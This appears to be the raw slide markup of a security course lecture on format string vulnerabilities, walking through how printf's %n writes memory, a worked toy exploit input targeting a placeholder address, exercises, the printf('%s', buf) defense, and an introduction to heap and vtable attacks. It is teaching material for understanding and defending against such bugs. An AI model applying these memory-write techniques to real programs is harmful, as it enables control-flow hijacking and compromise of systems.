            <a:off x="1959275" y="1216525"/>
            <a:ext cx="3758700" cy="1847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char buf[64];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*secret_string = "pancake";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secret_number = 42;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179400" y="1747475"/>
            <a:ext cx="133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42</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240975" y="3210350"/>
            <a:ext cx="43689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second format specifier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lang="en"/>
              <a:t> says to treat the next argument (arg2) as a pointer, and write the number of bytes printed so far to the address at arg2.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Google Shape;239;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523325" y="3978425"/>
            <a:ext cx="436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We've printed 2 bytes so far, so the number 2 gets written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secret_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Google Shape;240;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5820625" y="2147675"/>
            <a:ext cx="465763" cy="2687965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241" name="Google Shape;241;p29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secret_string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secret_number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242" name="Google Shape;242;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973025" y="2645275"/>
            <a:ext cx="313372" cy="1711680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43" name="Google Shape;243;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="24828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arg0</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="2233050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arg1</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="1970725"/>
            <a:ext cx="512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arg2</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="246" name="Google Shape;246;p29"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286375" y="397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'%'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'n'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'e'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0x02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0x00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0x00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0x00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2" name="Google Shape;252;p3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Strings: Stack Diagram</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;253;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1214094"/>
            <a:ext cx="3758700" cy="1293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buf[16];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str[12];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4" name="Google Shape;254;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="3418975"/>
            <a:ext cx="3801300" cy="14775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Now, let’s try some format string vulnerabilities where the user-controlled buffer is on the stack instead of in static memory.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the stack diagram look like?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="255" name="Google Shape;255;p30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1" name="Google Shape;261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Strings: Stack Diagram</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Google Shape;262;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="3418975"/>
            <a:ext cx="3801300" cy="10467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stack diagram while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is being called.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does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look for arguments?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="263" name="Google Shape;263;p31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4" name="Google Shape;264;p31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65" name="Google Shape;265;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1214094"/>
            <a:ext cx="3758700" cy="1293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buf[16];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str[12];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0" name="Google Shape;270;p32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arg7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arg6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arg5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arg4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arg3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arg2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arg1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0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>arg0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1" name="Google Shape;27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2" name="Google Shape;272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Strings: Stack Diagram</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Google Shape;273;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="3418975"/>
            <a:ext cx="3801300" cy="14775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We’ve labeled which values in memory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will interpret as arguments.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example, if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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> has 4 percent formatters,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/>
              <a:t> will match the last percent formatter with arg4.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;274;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1214094"/>
            <a:ext cx="3758700" cy="1293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buf[16];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str[12];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printf(buf);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75" name="Google Shape;275;p32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1" name="Google Shape;281;p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Write 100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2" name="Google Shape;282;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1216525"/>
            <a:ext cx="3801300" cy="10467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Attack scenario: Write the number 100 to memory address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input should the attacker supply?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="283" name="Google Shape;283;p33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arg7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arg6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arg5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arg3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arg1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4" name="Google Shape;284;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286363" y="38818"/>
            <a:ext cx="23247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buf[16];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str[12];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5" name="Google Shape;285;p33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Write 100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2" name="Google Shape;292;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1216525"/>
            <a:ext cx="5355900" cy="2016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Recall: When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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sees a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lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, it takes the next unused argument, treats it like an address, and writes </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the number of bytes printed so far</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to that address.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When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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sees the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lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, two things need to be true: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Control </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> we write: The next unused argument on the stack should be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Control </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> we write: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The number of bytes printed so far</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> should be 100.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293" name="Google Shape;293;p34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arg7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arg6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arg5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arg3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arg1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4" name="Google Shape;294;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286363" y="38818"/>
            <a:ext cx="23247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buf[16];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str[12];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5" name="Google Shape;295;p34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1" name="Google Shape;301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Write 100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2" name="Google Shape;302;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1216525"/>
            <a:ext cx="5355900" cy="1693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When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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sees the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lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, two things need to be true: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Control </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> we write: The next unused argument on the stack should be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Control </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> we write: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The number of bytes printed so far</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> should be 100.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Consider this exploit. What does it look like in memory?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03" name="Google Shape;303;p35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arg7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arg6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arg5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arg3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arg1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4" name="Google Shape;304;p35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05" name="Google Shape;305;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286363" y="38818"/>
            <a:ext cx="23247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buf[16];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str[12];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306" name="Google Shape;306;p35"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179400" y="328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1653550"/>
                <a:gridCol w="1265175"/>
                <a:gridCol w="713425"/>
                <a:gridCol w="588825"/>
                <a:gridCol w="559375"/>
                <a:gridCol w="575525"/>
              </a:tblGrid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Input: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%94c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%n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2" name="Google Shape;312;p3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Write 100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3" name="Google Shape;313;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1216525"/>
            <a:ext cx="5355900" cy="12621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When writing to memory, the percent formatters take up multiple bytes of memory.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For example,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%94c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is 4 characters and takes up 4 bytes of memory.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4" name="Google Shape;314;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286363" y="38818"/>
            <a:ext cx="23247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buf[16];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str[12];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315" name="Google Shape;315;p36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arg7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%c%c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arg6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%94c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arg5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0xdeadbeef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arg3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arg1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6" name="Google Shape;316;p36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317" name="Google Shape;317;p36"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179400" y="328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1653550"/>
                <a:gridCol w="1265175"/>
                <a:gridCol w="713425"/>
                <a:gridCol w="588825"/>
                <a:gridCol w="559375"/>
                <a:gridCol w="575525"/>
              </a:tblGrid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Input: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%94c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%n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 chars used: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3" name="Google Shape;323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Write 100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4" name="Google Shape;324;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1216525"/>
            <a:ext cx="5355900" cy="1693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Control </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> we write: The next unused argument on the stack should be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Each percent formatter “uses up” or “consumes” one argument on the stack.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We added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%c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> arguments to “consume” or “skip past”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str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, so that the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%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> argument aligns with arg4, where we put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25" name="Google Shape;325;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286363" y="38818"/>
            <a:ext cx="23247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buf[16];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str[12];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326" name="Google Shape;326;p37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arg7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%c%c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arg6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%94c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arg5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0xdeadbeef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arg3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arg1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7" name="Google Shape;327;p37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328" name="Google Shape;328;p37"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179400" y="328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1653550"/>
                <a:gridCol w="1265175"/>
                <a:gridCol w="713425"/>
                <a:gridCol w="588825"/>
                <a:gridCol w="559375"/>
                <a:gridCol w="575525"/>
              </a:tblGrid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Input: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%94c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%n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 chars used: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Consumes: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N/A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4" name="Google Shape;334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Write 100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35" name="Google Shape;335;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1216525"/>
            <a:ext cx="5355900" cy="190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Control </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> we write: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The number of bytes printed so far</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> should be 100.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%94c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> prints the next argument on the stack as a character, padded to 94 bytes. (Also works if you switch 94 with other numbers.)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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and the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%c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> formatters also caused characters to be printed, so we needed 100–4–1–1 = 94 padding bytes.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36" name="Google Shape;336;p38"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179400" y="328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1653550"/>
                <a:gridCol w="1265175"/>
                <a:gridCol w="713425"/>
                <a:gridCol w="588825"/>
                <a:gridCol w="559375"/>
                <a:gridCol w="575525"/>
              </a:tblGrid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Input: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%94c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%n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 chars used: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Consumes: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N/A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 bytes printed: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7" name="Google Shape;337;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286363" y="38818"/>
            <a:ext cx="23247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buf[16];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str[12];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338" name="Google Shape;338;p38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arg7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%c%c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arg6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%94c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arg5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0xdeadbeef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arg3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arg1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9" name="Google Shape;339;p38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5" name="Google Shape;345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Write 100 to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46" name="Google Shape;346;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1216525"/>
            <a:ext cx="5355900" cy="12621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How would you modify this exploit to write to address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0xbfff1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> instead of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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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How would you modify this exploit to write 89 bytes instead of 100 bytes?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47" name="Google Shape;347;p39"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179400" y="328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1653550"/>
                <a:gridCol w="1265175"/>
                <a:gridCol w="713425"/>
                <a:gridCol w="588825"/>
                <a:gridCol w="559375"/>
                <a:gridCol w="575525"/>
              </a:tblGrid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Input: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%94c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%c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%n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 chars used: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Consumes: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N/A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arg4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# bytes printed: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8" name="Google Shape;348;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286363" y="38818"/>
            <a:ext cx="2324700" cy="1108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buf[16];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char str[12];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fgets(buf, 16, stdin)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printf(buf);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349" name="Google Shape;349;p39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37225"/>
                <a:gridCol w="437225"/>
                <a:gridCol w="437225"/>
                <a:gridCol w="549800"/>
                <a:gridCol w="6553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arg7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%c%c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arg6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%94c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arg5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(buf)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  0xdeadbeef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arg3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arg1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&amp;buf [arg to printf]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arg0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printf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1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[printf frame]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50" name="Google Shape;350;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5973000" y="2880368"/>
            <a:ext cx="313372" cy="972479"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="58539" w="11083">
                <a:moveTo>
                  <a:pt x="11083" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9378" y="5853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String Vulnerabilities: Defense</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Google Shape;356;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2109750" y="1481825"/>
            <a:ext cx="4924500" cy="1662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buf[64];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if (fgets(buf, 64, stdin) == NULL)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return;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printf("%s", buf);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57" name="Google Shape;357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8" name="Google Shape;358;p40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3469800" y="2842950"/>
            <a:ext cx="3063000" cy="1261025"/>
            <a:chOff x="3469800" y="2842950"/>
            <a:chExt cx="3063000" cy="1261025"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="359" name="Google Shape;359;p40"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3764225" y="2842950"/>
              <a:ext cx="0" cy="8037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60" name="Google Shape;360;p40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3469800" y="3488375"/>
              <a:ext cx="3063000" cy="6156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Never use untrusted input in the first argument to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printf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Google Shape;361;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3971250" y="4047625"/>
            <a:ext cx="30630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the attacker can't make the number of arguments mismatched!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Heap Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="Google Shape;367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8" name="Google Shape;368;p41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3.6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Targeting Instruction Pointers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Google Shape;374;p4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Remember: You need to overwrite a pointer that will eventually be jumped to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Stack smashing involves the RIP, but there are other targets too (literal function pointers, etc.)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Google Shape;375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vtables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="Google Shape;38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2" name="Google Shape;382;p4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C++ is an object-oriented language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C++ objects can have instance variables and methods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C++ has </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>polymorphism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: implementations of an interface can implement functions differently, similar to Java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achieve this, each class has a vtable (table of function pointers), and each object points to its class’s vtable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vtable pointer is usually at the beginning of the object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 execute a function: Dereference the vtable pointer with an offset to find the function address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8" name="Google Shape;388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vtables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Google Shape;389;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="4284600"/>
            <a:ext cx="33513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"/>
              <a:t> is an object of type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ClassX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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is an object of type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ClassY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="390" name="Google Shape;390;p44"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="385375" y="153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391" name="Google Shape;391;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385452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Heap</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="392" name="Google Shape;392;p44"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="290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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="393" name="Google Shape;393;p44"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2488450" y="35875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94" name="Google Shape;394;p44"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="1532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395" name="Google Shape;395;p44"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2488450" y="22271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96" name="Google Shape;396;p44"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6546125" y="12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397" name="Google Shape;397;p44"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="2212775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8" name="Google Shape;398;p44"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="35563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9" name="Google Shape;399;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546202" y="3988800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Code</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Google Shape;400;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827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ClassX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> vtable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1" name="Google Shape;401;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827" y="2343138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ClassY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> vtable</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="402" name="Google Shape;402;p44"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5574525" y="1661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3" name="Google Shape;403;p44"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5574525" y="3044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9" name="Google Shape;409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vtables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="410" name="Google Shape;410;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="385375" y="153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11" name="Google Shape;411;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385452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Heap</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="412" name="Google Shape;412;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="290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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="413" name="Google Shape;413;p45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
